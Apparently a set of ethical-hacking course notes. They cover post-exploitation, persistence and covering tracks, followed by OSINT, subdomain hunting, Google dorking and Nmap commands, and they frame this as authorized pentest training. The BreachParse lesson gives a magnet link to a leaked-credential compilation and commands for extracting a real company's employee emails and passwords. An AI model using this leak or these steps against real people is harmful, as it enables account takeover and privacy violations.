Metasploit is a comprehensive framework for developing and executing exploits. It contains
numerous pre-written exploits for known vulnerabilities.

Metasploit can be used to automate the process of exploiting vulnerabilities, escalating privileges,
and maintaining access.

Common Metasploit Modules:

Exploit Modules: Used to launch exploits (e.g., exploiting a buffer overflow or RCE).

Post Exploitation Modules: Used to maintain access after exploiting a system, including creating
backdoors, keyloggers, and gathering credentials.

Auxiliary Modules: Used for scanning and gathering information but not directly exploiting
vulnerabilities.

Post-Exploitation

Once an attacker has successfully exploited a vulnerability and gained access, they often need to
maintain that access for further actions, such as data exfiltration, lateral movement, or privilege
escalation. This leads to the post-exploitation phase, which involves:

Maintaining Access: Establishing a backdoor or persistent access mechanism (e.g., creating a new
user account with admin privileges).

Covering Tracks: Deleting or modifying logs to hide evidence of the exploit.

Privilege Escalation: If the attacker only has low-level access, they may attempt to escalate their
privileges to gain full control.

Lateral Movement: Moving to other systems in the network to expand the compromise.

Data Exfiltration: Stealing sensitive information, such as documents, passwords, or credit card data.

Tools for Post-Exploitation:

Empire: A post-exploitation framework for PowerShell and Python.

Mimikatz: A popular tool for extracting clear-text passwords from Windows machines.

Netcat: Used to establish a remote shell and maintain access to compromised systems.

Conclusion
The exploitation phase is a critical step in both offensive security assessments (such as penetration
testing) and malicious attacks.

By exploiting vulnerabilities discovered during previous phases (scanning and enumeration), an
attacker gains access to a system, allowing them to further compromise the environment, steal data,
or carry out other malicious actions.

This phase is highly dependent on the types of vulnerabilities present and the specific attack
methods used, from network-based exploits to privilege escalation and social engineering tactics.

4. Maintain Access

When you're conducting reconnaissance (recon) for penetration testing, ethical hacking, or other
cybersecurity assessments, maintaining access is an important part of the process.

However, it’s important to clarify that maintaining access should only be done in legal, ethical, and
authorized contexts (such as penetration testing with client permission or within a bug bounty
program). Unauthorized access to systems is illegal and unethical.

Here’s a breakdown of ways attackers or penetration testers might maintain access during recon,
which is useful for understanding tactics that could be used to secure systems against intrusion:

A. Initial Access and Persistence


Before maintaining access, an attacker usually needs to gain initial access to a system. This could be
done through various methods such as:

Exploiting Vulnerabilities: Finding weaknesses in the system, whether it's an unpatched vulnerability
or a misconfiguration.

Phishing: Social engineering techniques to gain credentials or malware to execute on a target
machine.

Credential Stuffing: Using stolen credentials to access a system.

Brute Force: Cracking weak passwords.

B. Creating Backdoors
Once access is gained, attackers or penetration testers will often establish persistent backdoors to
maintain access. Some of the methods include:

Web Shells: If an attacker can gain access to a web server, they might upload a web shell, which is a
script (usually PHP, ASP, etc.) that allows remote access to the server.

Reverse Shells: Attackers might use a reverse shell, where the target machine connects back to the
attacker's machine, allowing continuous access.

SSH Keys: Adding new SSH keys to the server to allow login without requiring passwords.

Trojans/Rootkits: Malicious software designed to stay hidden and maintain control of the
compromised system.

Tools used for persistence:

Metasploit: Metasploit's Meterpreter shell can be used to maintain access through payloads, as well
as to create a reverse shell, modify files, and run commands.

Cobalt Strike: A commercial penetration testing tool that provides advanced post-exploitation
features, including maintaining access and escalating privileges.

Empire: A post-exploitation framework that provides PowerShell-based agents for maintaining
access.

C. Escalating Privileges
To maintain access, an attacker often needs elevated privileges on a system to ensure they have
control over it and can persist:

Privilege Escalation: Attackers will attempt to escalate their privileges using tools or exploiting
known vulnerabilities in the system. This might involve exploiting a weakness to obtain root or
administrator access.

Windows Local Privilege Escalation (LPE): Exploiting misconfigurations or vulnerabilities in Windows
to gain elevated privileges.

D. Covering Tracks and Evasion


Maintaining access is not just about leaving backdoors, but also covering tracks so that the intrusion
is not easily discovered. Some tactics include:

Clearing Logs: Deleting or modifying log files to remove evidence of the attacker's presence.

Hiding Malicious Code: Using obfuscation techniques or disguising the payloads to make detection
more difficult.

Rootkits and Anti-Forensics: Tools that hide malicious activity from administrators or intrusion
detection systems (IDS).

E. Remote Access and Control


To ensure long-term access, attackers might use remote access tools or C2 (Command and Control)
infrastructure:

VPN or Proxy Setup: Configuring a VPN or proxy to route traffic through, which would obscure the
attacker’s real location and make it harder for defenders to detect the source.

C2 Servers: Setting up C2 infrastructure that allows the attacker to send commands to compromised
systems. Cobalt Strike, for example, often uses C2 infrastructure to control and manage
compromised hosts.

F. Using Persistent Services


Attackers may install or modify system services to ensure their access is maintained even after a
reboot:

Creating New User Accounts: Adding new user accounts or modifying existing ones with elevated
privileges.

Install Persistent Services/Programs: Some attackers might install backdoors as system services or
create scheduled tasks that execute malicious programs regularly.

Modify Startup Files: Ensuring that a malicious program or backdoor is executed when the system
starts.

G. Automating Recon and Exploits


Once access is established, attackers or testers will often automate tasks to collect more information
or exploit vulnerabilities. Tools that facilitate automation of access maintenance include:

AutoRecon: A tool for automating reconnaissance, which can be useful for systematic enumeration
of a target.

BloodHound: A tool for Active Directory enumeration that can help attackers maintain access to
critical systems through privilege escalation.

H. Using Alternate Communication Channels


Attackers sometimes rely on non-traditional methods of communication to maintain access:

DNS Tunneling: Using DNS queries and responses to exfiltrate data or receive commands, bypassing
network security monitoring.

ICMP Tunneling: Sending data via ICMP packets (ping requests), a method useful for bypassing
firewalls that block typical traffic.

I. Data Exfiltration & Exploitation


After securing access, attackers may want to exfiltrate sensitive data or use it for further
exploitation. This may involve:

Data Exfiltration: Using secure methods like encrypted tunnels or steganography to avoid detection
while transferring stolen data.

Lateral Movement: Moving from one system to another in the same network to expand the reach
and control within an organization.

Mitigation Strategies to Prevent Access Maintenance:

Regular System Audits: Regular vulnerability assessments, system hardening, and patch
management can help mitigate the risk of an attacker gaining initial access.

Strong Authentication: Multi-factor authentication (MFA) can make it harder for attackers to gain
control over user accounts.

Endpoint Detection & Response (EDR): Tools that monitor and respond to suspicious activity on
endpoints, looking for signs of backdoors or malicious activity.

Network Monitoring: Tools that look for unusual network traffic patterns, such as communication with
C2 servers or DNS tunneling attempts.

Incident Response Plan: Ensure the ability to detect, contain, and respond to incidents rapidly.
Automated detection systems like SIEM (Security Information and Event Management) are essential
for real-time visibility.

Again, this is all assuming you’re conducting security research or penetration testing in an
authorized and ethical manner. Always ensure you have proper authorization before conducting
recon or attempting to maintain access to any system.

5. Covering Tracks

Covering tracks refers to the techniques used by attackers or penetration testers to erase or
obscure evidence of their activities to avoid detection. This is done to maintain access and avoid
raising alarms. Here are the key methods used:

Clearing Logs:

Delete or modify system logs (e.g., event logs, access logs) to remove traces of exploitation or
suspicious activity.

Tools like logcleaner or manual editing can be used to clear logs in Linux/Windows systems.

File and Process Hiding:

Hiding files or processes that are running on the system to prevent detection by security tools.

Rootkits or advanced malware can alter file and process visibility.

Using Rootkits:

Rootkits are malicious tools designed to hide the presence of malware by intercepting calls to the
operating system, making it harder to detect by security software or administrators.

They can hide files, processes, network connections, and even registry entries.

Obfuscation:

Masking or encoding malicious code (e.g., using polymorphic malware or packing tools) to avoid
detection by signature-based security systems like antivirus.

Using Anti-Forensic Tools:

Tools that prevent forensic analysis, such as wiping disk sectors or manipulating file timestamps
(timestomping); payload obfuscation tools such as Metasploit's msfvenom encoders serve a similar
evasion purpose.

Disguising Malware:

Changing file names, disguising malware as legitimate files, or hiding them in innocuous-looking
locations (e.g., system directories).

Changing User/Group Permissions:

Altering user or group permissions on sensitive files or directories to hide changes or prevent
detection by admins.

Creating False Evidence:

Sometimes attackers may insert fake evidence into logs or systems to mislead forensic
investigators.

Mitigation:
Regular Log Monitoring: Implementing real-time log monitoring can help detect unusual activities or
tampering.

File Integrity Monitoring: Tools that check file hashes regularly to spot unauthorized changes.
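
File integrity monitoring, listed above as a mitigation, reduces to recording a baseline of cryptographic hashes and re-checking them later. A minimal sketch (SHA-256 assumed; production tools like Tripwire or AIDE add secure baseline storage, scheduling, and alerting):

```python
import hashlib

def file_hash(path):
    """SHA-256 of a file's contents, read in chunks to handle large files."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def changed_files(baseline):
    """Compare current hashes against a saved {path: hash} baseline."""
    return [p for p, digest in baseline.items() if file_hash(p) != digest]
```

In practice the baseline itself must be stored somewhere the attacker cannot rewrite, or covering-tracks techniques defeat the check.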

Endpoint Detection and Response (EDR): Solutions that look for signs of evasion techniques and
maintain visibility of critical system activities.

Covering tracks is a critical part of an attacker's strategy to avoid detection, but it also highlights the
need for robust security monitoring and detection systems to identify and prevent it.

14. EHP Identifying our Target

Identifying our Target


Bugcrowd

Bugcrowd is a crowdsourced security platform. It was founded in 2012, and in 2019 it was one of the
largest bug bounty and vulnerability disclosure companies on the internet. Bugcrowd runs bug
bounty programs and also offers a range of penetration testing services it refers to as "Penetration
Testing as a Service" (PTaaS), as well as attack surface management.

Link:
https://www.bugcrowd.com/

The listed companies allow pentesting through Bugcrowd. The bug bounty programs can be found here.

Link:
https://bugcrowd.com/programs

HackerOne

HackerOne is a company specializing in cybersecurity, specifically attack resistance management,
which blends the security expertise of ethical hackers with asset discovery, continuous assessment,
and process enhancement to find and close gaps in the digital attack surface.

It was one of the first companies to embrace and utilize crowd-sourced security and cybersecurity
researchers as linchpins of its business model; pioneering bug bounty and coordinated vulnerability
disclosure.

As of December 2022, HackerOne's network had paid over $230 million in bounties. HackerOne's
customers include The U.S. Department of Defense, General Motors, GitHub, Goldman Sachs,
Google, Hyatt, Lufthansa, Microsoft, MINDEF Singapore, Nintendo, PayPal, Slack, Twitter, and Yahoo.

Link:
https://www.hackerone.com/

The listed companies allow pentesting through HackerOne. The bug bounty programs can be found here.

Link:
https://hackerone.com/bug-bounty-programs

Rules to follow
1. Read the Guidelines for the programs
2. Provide details of the vulnerability, including information needed to reproduce and validate the
vulnerability and a Proof of Concept (POC)

Scope and rewards

In scope targets
In scope targets define what you are allowed to test.

Out of scope targets
Out of scope targets define what you must not test.

15. EHP Gathering Breached Credentials with BreachParse

Gathering Breached Credentials with BreachParse

Breach-parse:

A tool for parsing breached passwords. It refers to a tool or process that analyzes data logs or events
associated with a security breach to extract meaningful insights or patterns (e.g., identifying the
source of the breach, how it occurred, what was affected).

Breach-parse Link
https://github.com/Byte-Capsule-Ltd/breach-parse
https://github.com/hmaverickadams/breach-parse

Download breached password list from magnet located here:

magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fglotorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337

Step 1:
First, install qBittorrent if it is not already installed.
Add the magnet link to qBittorrent.

Note: The download is more than 40 GB.

Step 2:

Go to the download location


>> cd /home/kali/Downloads

Move or copy the folder to the /opt directory:

>> sudo mv -f breach-parse /opt OR >> sudo cp -r breach-parse /opt (copying requires about 100 GB of free disk space)

Now go to root
>> sudo su

Go to this path
# cd /opt/breach-parse

Give the script execute permission


# chmod +rwx breach-parse.sh

Now run the command


# ./breach-parse.sh @tesla.com tesla.txt

Note: It will take some time.

It will extract some files in /opt/breach-parse

BreachCompilation tesla-master.txt tesla-users.txt
breach-parse.sh tesla-passwords.txt

Now see the file content


>> cat tesla-master.txt

To view the file with line numbers, use this

>> cat -n tesla-master.txt

That's it.
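
The core of what breach-parse does in the walkthrough above — find lines containing @domain in email:password format and split them into master, users, and passwords lists — can be sketched in a few lines of Python. This is illustrative only (the real script shards the work across the BreachCompilation directory tree), and the demo records are fabricated:

```python
def parse_breach(dump_lines, domain):
    """Split 'email:password' lines for a domain into master/users/passwords."""
    master, users, passwords = [], [], []
    for line in dump_lines:
        line = line.strip()
        # Keep only records for the target domain in email:password format.
        if f"@{domain}" not in line or ":" not in line:
            continue
        user, _, password = line.partition(":")  # split on the first colon only
        master.append(line)
        users.append(user)
        passwords.append(password)
    return master, users, passwords

if __name__ == "__main__":
    demo = ["bob@tesla.com:hunter2", "eve@other.com:x", "amy@tesla.com:pass1"]
    print(parse_breach(demo, "tesla.com"))
```

The three returned lists correspond to the tesla-master.txt, tesla-users.txt, and tesla-passwords.txt files the script produced above.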

16. EHP Hunting Breached Credentials with DeHashed

Hunting Breached Credentials with DeHashed

Dehashed (Paid tool)


https://dehashed.com/

DeHashed provides free deep-web scans and protection against credential leaks. A modern personal
asset search engine created for security analysts, journalists, security companies, and everyday
people to help secure accounts.

Gather information from breach data

Have I Been Pwned


https://haveibeenpwned.com/

Have I Been Pwned allows you to search across multiple data breaches to see if your email address
or phone number has been compromised.


Shodan
https://www.shodan.io/

Shodan Search Engine


Search engine of Internet-connected devices. Create a free account to get started (use protonmail).

Shodan is a search engine that lets users search for various types of servers (webcams, routers,
servers, etc.) connected to the internet using a variety of filters.

[1] Some have also described it as a search engine of service banners, which is metadata that the
server sends back to the client.

[2] This can be information about the server software, what options the service supports, a welcome
message or anything else that the client can find out before interacting with the server.

Hunter
https://hunter.io/

Find email addresses and send cold emails. Hunter is the leading solution to find and verify
professional email addresses. Start using Hunter and connect with the people that matter for your
business.

Similar tools:

1. https://www.criminalip.io/en
2. https://search.censys.io/
3. https://www.zoomeye.hk/
4. https://ivre.rocks/
5. https://en.fofa.info/
6. https://wapiti-scanner.github.io/
7. https://weleakinfo.io/
8. https://www.onyphe.io/pricing#freemium
9. https://hunter.how/

17. EHP Hunting Subdomains Part 1


Hunting Subdomains Part 1
Subdomain Finding Tools

1. sublist3r (sudo apt install sublist3r)

To see the user manual for sublist3r


>> sublist3r -h

2. crt.sh (website)

To search, use this pattern


>> %.example.com

Extra link for subdomain finder


https://subdomainfinder.c99.nl/

18. EHP Hunting Subdomains Part 2

Hunting Subdomains Part 2


Continue from 17. EHP Hunting Subdomains Part 1

3. subfinder

Link:
https://github.com/projectdiscovery/subfinder

>> subfinder -d example.com

To set the number of concurrent threads, use the -t flag:

>> subfinder -d example.com -t (number of threads)


example:
subfinder -d example.com -t 10

4. owasp amass

Link:
https://github.com/owasp-amass/amass

5. Tomnomnom's httprobe
To check whether discovered subdomains are live

Link:
https://github.com/tomnomnom/httprobe

19. EHP Identifying Website Technologies

Identifying Website Technologies


BuiltWith

BuiltWith tracks over 2500 eCommerce technologies across over 26 million eCommerce websites
backed with extensive exportable attributes including spend, revenue, employee count, social media
count, industry, location, rank and many more.

Link:
https://builtwith.com

Wappalyzer

Find out the technology stack of any website. Create lists of websites and contacts by the
technologies they use.

Link:
https://www.wappalyzer.com

Firefox Add-Ons Link


https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

Chrome extensions Link


https://chromewebstore.google.com/detail/wappalyzer-technology-pro/
gppongmhjkpfnbhagpmjfkannfbllamg

Whatweb
Whatweb is a kali Linux tool. It is preinstalled on the os.

Command

>> whatweb example.com

20. EHP Information Gathering with Burp Suite

Information Gathering with Burp Suite


Information gathering is a crucial phase in penetration testing, and Burp Suite provides powerful
tools for this process.

1. https://portswigger.net/web-security/all-topics
2. https://www.vaadata.com/blog/introduction-to-burp-suite-the-tool-dedicated-to-web-application-
security/
3. https://dataspaceacademy.com/blog/burp-suite-overview-features-tools-and-benefits
4. https://tcm-sec.com/burp-suite-macros-a-hands-on-guide/
5. https://www.youtube.com/watch?v=slxHpp7ilYU
6. https://en.wikipedia.org/wiki/Burp_Suite

More about Burp

3. https://tcm-sec.com/burp-extension-development-part-1-setup-basics/
4. https://tcm-sec.com/burp-extension-dev-part-4-gui-design/

Install BURP SUITE Professional on LINUX for FREE


https://medium.com/@zisansakibhaque/install-burp-suite-professional-on-linux-for-free-
bccc6c6dfdf1

Week 5

21. EHP Google Fu

Google Fu
Google Fu refers to the art of crafting advanced search queries to uncover specific information on
the internet. In the context of ethical hacking, Google Fu is used to identify vulnerabilities, gather
intelligence, and aid in penetration testing. Here are some key concepts and techniques:

Advanced Search Operators

Filetype: Search for specific file types (e.g., filetype:pdf for PDF files).

Inurl: Search for keywords within URLs (e.g., inurl:login for pages with “login” in the URL).

Intext: Search for keywords within page content (e.g., intext:"password" for pages containing the
word “password”).

Intitle: Search for keywords in page titles (e.g., intitle:"index of" for directory listings).
Link: Search for pages linking to a specific URL (e.g., link:http://example.com).
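
These operators compose into a single query string. A tiny helper (the function name and interface are invented for illustration) shows how a dork is assembled from operator/value pairs:

```python
def build_dork(**operators):
    """Assemble a Google dork from operator=value pairs, e.g. site, filetype."""
    return " ".join(f"{op}:{val}" for op, val in operators.items())

if __name__ == "__main__":
    print(build_dork(site="example.com", filetype="pdf", intext='"password"'))
    # site:example.com filetype:pdf intext:"password"
```

The resulting string is pasted straight into the Google search box; the same composition idea underlies the dork generators linked below.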

Google Hacking Techniques

Vulnerability identification: Use search queries to identify vulnerable versions of software,
plugins, or modules.
Information gathering: Search for sensitive information, such as credentials, configuration files, or
error messages.

Directory listing: Use intitle:"index of" to find directory listings, which can reveal file structures and
potential vulnerabilities.

File discovery: Search for specific file types (e.g., filetype:sql) or use inurl to find files with specific
names.

Best Practices

Use quotes: Enclose search terms in quotes to search for exact phrases.

Use the site operator: Limit searches to specific websites using the site: operator (e.g.,
site:example.com).

Use the OR operator: Combine search terms using the OR operator (e.g., password OR
credentials).

Be cautious: Avoid using Google Fu for malicious purposes, as it can be used to identify and exploit
vulnerabilities.

Tools and Resources

Google Advanced Search: Explore Google’s built-in advanced search features and operators.

Google Dorking Database: Access a comprehensive database of Google hacking queries and
examples.

Acunetix Web Vulnerability Scanner: Utilize an automated web vulnerability scanner to identify
and prioritize vulnerabilities.

Ethical Considerations

Obtain permission: Ensure you have permission to conduct Google Fu searches and testing on the
targeted systems.

Respect privacy: Avoid searching for sensitive information or targeting systems without explicit
permission.

Report findings: Document and report any identified vulnerabilities or issues to the system owners
or administrators.

By mastering Google Fu and adhering to ethical guidelines, ethical hackers can leverage these
advanced search techniques to aid in penetration testing, vulnerability identification, and
information gathering, ultimately improving the security and resilience of targeted systems.

Google Dorks

Link:
https://dorksearch.com/
https://dorkgenius.com/

Google Dorks for Bug Bounty

Link:
https://taksec.github.io/google-dorks-bug-bounty/
https://x.com/TakSec

22. EHP Utilizing Social Media

Utilizing Social Media


Social Media for Ethical Hacking

Social media plays a crucial role in ethical hacking’s information gathering phase. Ethical hackers
leverage social media platforms to gather valuable insights about their targets, including:

Employee profiles: Hackers can identify employees, their roles, and connections, which helps in
understanding the organization’s structure and potential attack vectors.

Company information: Social media platforms often provide publicly available information about a
company, such as its products, services, and mission statements.

Network and system details: Hackers can gather information about a company’s network
infrastructure, including IP addresses, subdomains, and open ports.

Employee behavior: Observing employee behavior on social media can help hackers identify
potential vulnerabilities, such as weak passwords or phishing susceptibility.

Company culture: Social media can provide insights into a company’s culture, including its values,
policies, and security practices.

Tools and Techniques

Several tools and techniques are used to gather information from social media platforms:

Recon-ng: A web reconnaissance framework that extracts information from social media platforms,
online databases, and web sources.

SpiderFoot: An open-source OSINT automation tool that collects information from various sources,
including social media, DNS, WHOIS, and threat intelligence feeds.

Google Fu: Advanced search-query techniques used to gather information from publicly available sources, including social media profiles and company websites.

Best Practices

When utilizing social media for information gathering in ethical hacking, it’s essential to:

Respect privacy: Only gather publicly available information and avoid accessing private profiles or
data without explicit permission.

Use automated tools responsibly: Ensure that automated tools are configured to respect privacy
settings and avoid overwhelming social media platforms with requests.

Document findings: Keep detailed records of gathered information to facilitate analysis and
reporting.

Maintain ethical boundaries: Avoid using gathered information for malicious purposes and
prioritize the ethical hacking framework’s principles.

By leveraging social media effectively, ethical hackers can gather valuable information about their
targets, improving the accuracy and efficiency of their assessments and ultimately enhancing the
organization’s security posture.

Social Media Information Gathering

Social media has become a valuable tool for gathering information about individuals. This can be
done through various means, including:

1. Publicly Available Information

Social media profiles (e.g., Facebook, Twitter, LinkedIn) often contain publicly available information,
such as:
• Biographical details (name, age, location, occupation)
• Interests and hobbies
• Friends and connections
• Posts and updates (which can provide insights into their thoughts, opinions, and behaviors)

2. Social Listening

Social listening involves monitoring social media conversations about a specific individual,
organization, or topic. This can help gather information on:
• Mentions and references to the person
• Opinions and sentiments expressed about them
• Relevant discussions and topics they participate in

3. Data Collection through APIs and Tools

Many social media platforms provide APIs (Application Programming Interfaces) that allow
developers to access and collect data. Tools like:
• Twitter Streaming API
• Facebook Graph API
• LinkedIn API
• Social media listening tools (e.g., Hootsuite, Sprout Social)

can be used to collect and analyze data on individuals, including:

+ Profile information
+ Post and update history
+ Engagement metrics (likes, comments, shares)
+ Network and connection data

4. Sentiment Analysis and Opinion Mining

Sentiment analysis and opinion mining involve using algorithms to analyze the tone and sentiment
of social media posts about an individual. This can help identify:
• Positive and negative opinions about the person
• Trends and patterns in public perception
• Potential areas of concern or controversy
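As a toy illustration of the idea (production systems use trained models, not word lists), the sketch below scores posts against small positive/negative keyword sets; the word lists and scoring rule are invented for this example:

```python
# Toy keyword-based sentiment scorer. Real sentiment analysis uses trained
# models; the word lists and scoring rule here are illustrative only.

POSITIVE = {"great", "good", "love", "excellent", "trust"}
NEGATIVE = {"bad", "hate", "breach", "scam", "terrible"}

def sentiment_score(post: str) -> int:
    """Return positive-minus-negative keyword count for a post."""
    words = post.lower().split()
    return sum(w in POSITIVE for w in words) - sum(w in NEGATIVE for w in words)

posts = [
    "I love this company, great support",
    "Terrible experience after the data breach",
]
for p in posts:
    print(sentiment_score(p), p)
```

Even this crude scoring shows the mechanics: aggregate scores over many posts reveal trends and patterns in public perception about a person or organization.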

5. Contextual Analysis

Contextual analysis involves examining the broader context in which social media conversations
about an individual take place. This can include:
• Identifying influencers and key opinion leaders
• Analyzing the role of hashtags and keywords
• Understanding the impact of events and news on public perception

Ethical Considerations

When gathering information about an individual through social media, it’s essential to consider
ethical implications, such as:
• Respect for privacy and personal boundaries
• Avoiding harassment or targeted attacks
• Ensuring data collection and analysis are transparent and compliant with platform terms and
regulations

Best Practices

To effectively utilize social media for information gathering on a person, follow these best practices:
• Clearly define the purpose and scope of the information gathering
• Use publicly available information and APIs whenever possible
• Respect privacy boundaries and avoid collecting sensitive or personal data
• Analyze and interpret data in a responsible and unbiased manner

By understanding these methods and best practices, you can effectively utilize social media for
information gathering on a person while maintaining ethical standards.

23. EHP OSINT Fundamentals

OSINT Fundamentals
Open-Source Intelligence (OSINT) refers to the collection, analysis, and dissemination of publicly
available information from various sources, including the internet, social media, news articles, and
other publicly accessible data. OSINT is a crucial component of intelligence gathering, as it provides
valuable insights and information without requiring access to classified or proprietary data.

Key Concepts:

1. Publicly Available Information (PAI): Information that is freely accessible and can be found
through online searches, news articles, and other publicly available sources.

2. Open-Source Intelligence (OSINT): The process of collecting, analyzing, and disseminating PAI
to support intelligence operations, decision-making, and situational awareness.

3. Non-attributional Search: Conducting online searches anonymously to protect privacy and avoid revealing one's identity.

4. Information Quality: Evaluating the reliability and credibility of PAI to ensure accurate and
trustworthy insights.

OSINT Techniques:

1. Advanced Search Queries: Utilizing search engines to their full potential, including advanced search operators and syntax.

2. Social Media Analysis: Collecting and analyzing data from social media platforms to identify
trends, sentiment, and potential threats.

3. Web Scraping: Extracting data from websites and online sources using specialized tools and
techniques.

4. Historical Research: Gathering and analyzing historical information to identify patterns, trends,
and potential risks.

OSINT Tools:

1. Maltego: A popular OSINT tool for collecting and analyzing data from various sources, including
social media and the dark web.

2. Spiderfoot: A tool for automating OSINT tasks, including search engine queries and web
scraping.

3. Custom Python Tools: Utilizing Python programming language to create custom OSINT tools
and scripts.

Best Practices:

1. Curiosity and Passion: Developing a curiosity-driven approach to OSINT, with a passion for
continuous learning and improvement.

2. Ethical Considerations: Adhering to ethical guidelines when collecting and analyzing PAI,
ensuring responsible and respectful use of publicly available information.

3. Continuous Training: Staying up-to-date with the latest OSINT techniques, tools, and trends
through ongoing training and professional development.

Real-World Applications:

1. Cyber Threat Intelligence: Identifying and monitoring cyber threats, vulnerabilities, and
incident response efforts using OSINT.

2. Competitive Intelligence: Gathering market research, competitor analysis, and business intelligence using OSINT.

3. Law Enforcement: Collecting and analyzing information on criminal activities, monitoring criminal networks, and supporting investigations using OSINT.

4. Government and Intelligence Agencies: Gathering information on potential security threats, monitoring geopolitical events, and supporting decision-making using OSINT.

By understanding the fundamentals of OSINT, individuals can leverage publicly available information to support their work, improve decision-making, and stay ahead of emerging threats.

OSINT Fundamentals for Ethical Hacking


Introduction to OSINT Fundamentals: OSINT, or Open-Source Intelligence, is the process of
collecting and analyzing information from publicly available sources to gather intelligence. In the
context of ethical hacking, OSINT is used to gather information about a target organization or
individual, which can be used to identify potential vulnerabilities and weaknesses.

• Importance of OSINT in Ethical Hacking: OSINT is a crucial step in the ethical hacking process,
as it allows hackers to gather information about a target without having to resort to more invasive or
malicious methods. By using OSINT, ethical hackers can identify potential vulnerabilities and
weaknesses, and then use that information to simulate an attack and test the target’s defenses.

• OSINT Techniques and Tools: There are a variety of OSINT techniques and tools available,
including Google Dorking, metadata analysis, and social media analysis. These tools and techniques
can be used to gather information about a target, including their IP address, domain name, and other
relevant details. Some popular OSINT tools include Maltego, Shodan, and TheHarvester.

• Ethical Considerations: When using OSINT for ethical hacking, it’s essential to consider the
ethical implications of gathering and analyzing information from publicly available sources. Ethical
hackers must ensure that they are not violating any laws or regulations, and that they are respecting
the privacy and security of the target organization or individual.

• Best Practices for OSINT in Ethical Hacking: To get the most out of OSINT in ethical hacking,
it’s essential to follow best practices, such as defining clear objectives, using automated tools, and
verifying the accuracy of the information gathered. Additionally, ethical hackers should stay up-to-date with the latest OSINT tools and techniques, and be aware of the potential risks and limitations of
using OSINT in ethical hacking.

For More

https://www.youtube.com/watch?v=FS9j131Gq-M

Week 6

24. EHP Scanning with Nmap

Scanning with Nmap

https://nmap.org/book/man-port-scanning-techniques.html

Support Group
"Mastering Nmap: Essential Commands for Network Scanning and Recon for Hacking"

1. Scan a single IP
>> nmap 192.168.1.1
Performs a simple scan on the specified IP address.

2. Scan multiple IPs


>> nmap 192.168.1.1 192.168.1.2 192.168.1.3
Scans the given list of IP addresses.

3. Scan a range of IPs


>> nmap 192.168.1.1-100
Scans IPs from 192.168.1.1 to 192.168.1.100.

4. Detect services and versions


>> nmap -sV 192.168.1.1
Detects open ports and services along with their versions.

5. Aggressive scan with OS detection


>> nmap -A 192.168.1.1
Performs a detailed scan with OS detection, version detection, script scanning, and traceroute.

6. Scan specific ports


>> nmap -p 22,80,443 192.168.1.1
Scans only the specified ports.

7. Scan all 65,535 ports


>> nmap -p- 192.168.1.1
Performs a full port scan.

8. Use default scripts


>> nmap -sC 192.168.1.1
Runs default scripts to gather additional information.

9. Run specific NSE script

>> nmap --script http-title 192.168.1.1
Runs the http-title script to extract the title of a web page.

10. Run multiple scripts


>> nmap --script http-title,http-headers 192.168.1.1
Runs both the http-title and http-headers scripts.

11. Use a decoy to hide your IP


>> nmap -D RND:10 192.168.1.1
Generates 10 random decoy IPs to obfuscate the scan source.

12. Scan ports in sequential order


>> nmap -r 192.168.1.1
Scans ports consecutively instead of in the default random order.

13. Save output in multiple formats


>> nmap -oA scan_results 192.168.1.1
Saves the output in .nmap, .xml, and .gnmap formats.

14. Save output in a plain text file


>> nmap -oN results.txt 192.168.1.1
Saves results in a human-readable text file.

15. Scan an entire subnet


>> nmap 192.168.1.0/24
Scans all devices in the 192.168.1.x subnet.

16. List all live hosts (no port scan)


>> nmap -sn 192.168.1.0/24
Performs a ping scan to list live hosts without scanning ports.

17. Netdiscover
>> netdiscover -i eth0 -r 192.168.1.0/24
Performs ARP-based host discovery on the local network 192.168.1.0/24. This subnet range includes IP addresses from 192.168.1.0 to 192.168.1.255.
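Under the hood, a plain TCP connect scan (nmap -sT) simply attempts a connection to each port. The sketch below reimplements that idea with Python's standard socket module; it is for understanding the mechanism only, and you should use Nmap itself (and only against hosts you have permission to scan) for real work:

```python
# Minimal TCP connect scan: the same idea as `nmap -sT` on a few ports.
# For learning only; scan hosts you have permission to test.
import socket

def scan_ports(host: str, ports, timeout: float = 0.5):
    """Return the subset of `ports` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    print(scan_ports("127.0.0.1", [22, 80, 443]))
```

Nmap adds far more on top of this loop (SYN scans, timing templates, service detection, NSE scripts), which is why the tool is preferred over hand-rolled scanners.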

For more

https://www.youtube.com/playlist?list=PLOSJSv0hbPZAAeHUSEcq5lG6NkIqOGcb4

https://medium.com/@zisansakibhaque/network-scanning-101-c47c655f2d98

25. EHP Enumerating HTTP and HTTPS Part 1

Enumerating HTTP and HTTPS Part 1


Search on search engines about what can be done with insecure HTTP methods.

List all scripts about http

--> ls -al /usr/share/nmap/scripts/ | grep -e "http-"

--> nmap -Pn -sV -T4 --script http-methods --script-args http-methods.test=all bytecapsuleit.com
________________________________________
---------------- OUTPUT ----------------
________________________________________

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 10:52 EST

Nmap scan report for bytecapsuleit.com (104.26.4.235)
Host is up (0.085s latency).
Other addresses for bytecapsuleit.com (not scanned): 104.26.5.235 172.67.68.31
2606:4700:20::681a:4eb 2606:4700:20::681a:5eb 2606:4700:20::ac43:441f
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp  open  ssl/http Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
8080/tcp open  http     Cloudflare http proxy
|_http-server-header: cloudflare
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8443/tcp open  ssl/http Cloudflare http proxy
|_http-server-header: cloudflare

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

